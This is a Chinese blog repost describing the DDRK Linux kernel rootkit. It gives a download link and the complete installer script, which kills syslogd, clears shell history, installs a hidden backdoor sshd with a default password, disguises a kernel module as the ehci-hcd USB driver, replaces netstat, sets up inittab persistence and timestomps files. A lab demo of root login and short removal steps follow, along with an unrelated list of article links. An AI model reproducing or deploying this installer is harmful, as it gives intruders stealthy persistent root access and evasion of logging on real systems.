Linux下rootkit-ddrk攻击获得root权限以及清除方法
来源:互联网 发布:宜宾网络电视台 编辑:程序博客网 时间:2024/05/23 01:57
DDRK是一个Linux结合shv和adore-ng优点,内核级别的rootkit。
DDRK中包含的文件:
netstat #替换系统中的netstat,从ssh配置文件中读取端口并隐藏
rk.ko #内核模块,实现文件和进程的隐藏功能
setup #rootkit安装文件
tty #ava工具
bin.tgz
---ttymon
---sshd.tgz
---.sh
---shdcf2 #sshd配置文件
---shhk
---shhk.pub
---shrs
---sshd #sshd主程序
DDRK下载地址:http://pan.baidu.com/s/1qWkchlU
因此只要把这些文件上传到服务器上并成功运行,就可以获得该服务器的root权限。为所欲为,无所不能。
setup内容如下:
#!/bin/bash##########define variables##########DEFPASS=123456 //默认密码DEFPORT=43958 //默认端口BASEDIR=`pwd`SSHDIR=/lib/libsh.soHOMEDIR=/usr/lib/libshunset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZEexport PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin##########check is root##########if [ "$(whoami)" != "root" ]; then echo "BECOME ROOT AND TRY AGAIN" echo "" exitfi##########extract all tar##########tar zxf bin.tgzcd bintar zxf sshd.tgzrm -rf ./sshd.tgzcd $BASEDIRrm -rf bin.tgzcd $BASEDIR##########kill syslogd##########killall -9 syslogd >/dev/null 2>&1sleep 2##########remove sh.conf##########if [ -f /etc/sh.conf ]; then rm -rf /etc/sh.conf //经过md5sum加密过的密码文件fi##########initialize sshd configuration##########if test -n "$1" ; then echo "Using Password : $1" cd $BASEDIR/bin echo -n $1|md5sum > /etc/sh.confelse echo "No Password Specified, using default - $DEFPASS" echo -n $DEFPASS|md5sum > /etc/sh.conffitouch -acmr /bin/ls /etc/sh.confchown -f root:root /etc/sh.confif test -n "$2" ; then echo "Using ssh-port : $2" echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2 mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcfelse echo "No ssh-port Specified, using default - $DEFPORT" echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2 mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcffi###########creating dirs##########SSHDIR=/lib/libsh.soHOMEDIR=/usr/lib/libshif [ -d /lib/libsh.so ]; then rm -rf /lib/libsh.sofiif [ -d /usr/lib/libsh ]; then rm -rf /usr/lib/libsh/*fimkdir $SSHDIRtouch -acmr /bin/ls $SSHDIRmkdir $HOMEDIRtouch -acmr /bin/ls $HOMEDIRcd $BASEDIR/binmv .sh/* $SSHDIR/mv .sh/.bashrc $HOMEDIRif [ -f /sbin/ttyload ]; then chattr -AacdisSu /sbin/ttyload rm -rf /sbin/ttyloadfiif [ -f /usr/sbin/ttyload ]; then rm -rf /usr/sbin/ttyloadfiif [ -f /sbin/ttymon ]; then rm -rf /sbin/ttymonfi mv $SSHDIR/sshd /sbin/ttyloadchmod a+xr /sbin/ttyloadchmod o-w /sbin/ttyloadtouch -acmr /bin/ls /sbin/ttyloadkill -9 `pidof ttyload` >/dev/null 2>&1 mv $BASEDIR/bin/ttymon /sbin/ttymonchmod a+xr /sbin/ttymontouch -acmr /bin/ls /sbin/ttymonkill -9 `pidof ttymon` >/dev/null 2>&1 cp /bin/bash $SSHDIR#########modify inittab##########cp /etc/inittab /etc/.inittabsed -e s@^1:2345@0:2345:once:/usr/sbin/ttyload &@ /etc/inittab > /etc/.inittabtouch -acmr /etc/inittab /etc/.inittabmv -f /etc/.inittab /etc/inittabecho "/sbin/ttyload -q > /dev/null 2>&1" > /usr/sbin/ttyloadecho "/sbin/ttymon > /dev/null 2>&1" >> /usr/sbin/ttyloadecho "${HOMEDIR}/tty i `pidof ttyload` > /dev/null 2>&1" >> /usr/sbin/ttyloadecho "${HOMEDIR}/tty i `pidof ttymon` > /dev/null 2>&1" >> /usr/sbin/ttyloadtouch -acmr /bin/ls /usr/sbin/ttyloadchmod 755 /usr/sbin/ttyload/usr/sbin/ttyload > /dev/null 2>&1touch -amcr /bin/ls /etc/inittab##########make sure inittab has modified##########if [ ! "`grep ttyload /etc/inittab`" ]; then echo "# WARNING - SSHD WONT BE RELOADED UPON RESTART " echo "# inittab shuffling probly fucked-up ! "fi##########load rk.ko##########cd $BASEDIRmodprobe -r ehci-hcdmv -f rk.ko /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.komodprobe ehci-hcdmv tty $HOMEDIR##########replace netstat##########touch -acmr /bin/netstat netstatmv -f netstat /bin/netstat##########hide all files and process##########$HOMEDIR/tty h /etc/sh.conf > /dev/null 2>&1$HOMEDIR/tty h /lib/libsh.so > /dev/null 2>&1$HOMEDIR/tty h /usr/lib/libsh > /dev/null 2>&1$HOMEDIR/tty h /sbin/ttyload > /dev/null 2>&1$HOMEDIR/tty h /usr/sbin/ttyload > /dev/null 2>&1$HOMEDIR/tty h /sbin/ttymon > /dev/null 2>&1$HOMEDIR/tty i `pidof ttyload` > /dev/null 2>&1$HOMEDIR/tty i `pidof ttymon` > /dev/null 2>&1##########load rk.ko on boot##########cat > /etc/sysconfig/modules/ehci.modules << EOF#!/bin/sh#install usb modules supportmodprobe -r ehci-hcdmodprobe ehci-hcdEOFtouch -amcr /bin/ls /etc/sysconfig/modules/ehci.moduleschmod 755 /etc/sysconfig/modules/ehci.modules$HOMEDIR/tty h /etc/sysconfig/modules/ehci.modules > /dev/null 2>&1##########check iptables setting##########if [ -f /sbin/iptables ]; then echo "`/sbin/iptables -L INPUT | head -5`"else echo "" echo "# lucky for u no iptables found"fi##########start syslogd##########/sbin/syslogd -m 0 <span style="font-family: 宋体; text-indent: 2em; background-color: rgb(255, 255, 255);"> </span>
# ./setup 123 3333 //设置密码为123,端口号为3333
Using Password : 123
Using ssh-port : 3333
Chain INPUT (policy ACCEPT)
target prot opt source destination
隐藏效果查看:
查看进程
# ps -ef | egrep -i "ttyload|ttymon"
root 24761 17990 0 13:29 pts/2 00:00:00 egrep -i ttyload|ttymon
查看端口
# netstat -ntplu
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2117/hpiod
- tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 2267/mysqld
tcp 0 0 0.0.0.0:43958 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2134/cupsd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2295/sendmail: acce
tcp 0 0 127.0.0.1:2207 0.0.0.0:* LISTEN 2122/python
udp 0 0 0.0.0.0:32768 0.0.0.0:* 2417/avahi-daemon:
udp 0 0 0.0.0.0:68 0.0.0.0:* 19752/dhclient
udp 0 0 0.0.0.0:5353 0.0.0.0:* 2417/avahi-daemon:
udp 0 0 0.0.0.0:631 0.0.0.0:* 2134/cupsd
查看加载模块
# lsmod | grep -i ehci-hcd
查看rootkit相关文件
# ls -dl /lib/libsh.so /usr/lib/libsh /etc/sh.conf /sbin/ttyload /sbin/ttymon /bin/ttymon /usr/sbin/ttyload
ls: /bin/ttymon: No such file or directory
-rw-r--r-- 1 2618748389 4063569279 36 Nov 28 2006 /etc/sh.conf
drwxr-xr-x 2 2618748389 4063569279 4096 May 11 13:28 /lib/libsh.so
-rwxr-xr-x 1 2618748389 4063569279 212747 Nov 28 2006 /sbin/ttyload
-rwxrwxr-x 1 2618748389 4063569279 93476 Nov 28 2006 /sbin/ttymon
drwxr-xr-x 2 2618748389 4063569279 4096 May 11 13:28 /usr/lib/libsh
-rwxr-xr-x 1 2618748389 4063569279 171 Nov 28 2006 /usr/sbin/ttyload
查看/etc/inittab文件
# Run gettys in standard runlevels
0:2345:once:/usr/sbin/ttyload
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
验证:
已攻破并成功执行的主机IP为:192.168.27.129
从另一台登录192.168.27.129,密码为123,端口号为3333
[root@localhost ~]# ssh 192.168.27.129 -p 3333
root@192.168.27.129s password:
Last login: Thu Nov 11 11:20:59 2010 from 192.168.27.1
[sh] w.e.l.c.o.m.e
[sh] To The DoDos Rootkit
[root@DoDo:/root]#
[root@DoDo:/root]# env
TERM=xterm
SHELL=/bin/bash
SSH_CLIENT=192.168.27.130 38824 3333
SSH_TTY=/dev/pts/3
USER=root
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:
mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.
csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:
*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp
=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
MAIL=/var/spool/mail/root
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:/usr/local/sbin:/usr/lib/libs:.
PWD=/root
MACHINE=DoDo
PS1=[33[0;36m][$ID@[33[1;37m]$MACHINE[33[0m][33[0;36m]:${PWD}]#[33[0m]
SHLVL=1
HOME=/usr/lib/libsh
ID=root
LOGNAME=root
_=/bin/env
至此,就可以完全控制192.168.27.129了。
到192.168.27.129上查看登录用户:
# w
13:40:55 up 3:40, 0 users, load average: 1.23, 0.93, 0.77
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
只有本地用户。
清除方法:
# cd /usr/lib/libsh
# modprobe -r ehci-hcd
# ./tty u /etc/sysconfig/modules/ehci.modules
Checking for adore 0.12 or higher ...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# rm -rf /etc/sysconfig/modules/ehci.modules
# rm -rf /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko
# ./tty u /etc/sh.conf
Checking for adore 0.12 or higher ...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /lib/libsh.so
Checking for adore 0.12 or higher ...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /sbin/ttyload
Checking for adore 0.12 or higher ...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /usr/sbin/ttyload
Checking for adore 0.12 or higher ...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /sbin/ttymon
Checking for adore 0.12 or higher ...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# rm -rf /etc/sh.conf /lib/libsh.so /usr/lib/libsh /sbin/ttyload /usr/sbin/ttyload /sbin/ttymon
# rm –rf /bin/netstat
# vim /etc/inittab 去掉0:2345:once:/usr/sbin/ttyload
其实,还应该检查系统漏洞在何处,以绝后患。
- Linux下rootkit-ddrk攻击获得root权限以及清除方法
- Debian Linux 下获得Root权限以及使用Root登入图像界面的办法
- linux下获得root权限运行程序
- linux下获得root权限运行程序
- linux下获得root权限运行程序
- 栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(三)linux下进程中的多用户
- 栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(四)linux下进程内存布局
- 栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(七)利用寄存器攻击
- ubuntu下获得root权限
- Unix 下获得 root权限
- Ubuntu下获得root权限
- ubuntu下获得root权限
- ubuntu下获得linux命令的root权限
- linux下让一个用户获得root权限
- linux下用户管理和让用户获得root权限
- 栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(一)函数如何执行
- 栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(二)shellcode
- 栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(五)栈溢出原理
- 使用脚本检测域名是否被注册了
- c++ 调用 wget 下载网页图片
- 浙江大学PAT_乙级_1036. 跟奥巴马一起编程(15)
- Freda的道路
- 网络赚钱 签到就可以赚钱的网赚 持续更新
- Linux下rootkit-ddrk攻击获得root权限以及清除方法
- 10000 pcs free gift of chinese top grade brown film faced plywood
- 二叉树的先中后序遍历的递归和非递归实现
- MySQL数据库管理(二)单机环境下MySQL Cluster的安装
- 数据结构与算法之----图
- sublime 配置 vim模式 并修改 Esc快捷键
- C#网络编程系列文章(四)之TcpListener实现同步TCP服务器
- MultipleInputs实现reduce端连接
- 求1000以内的回文素数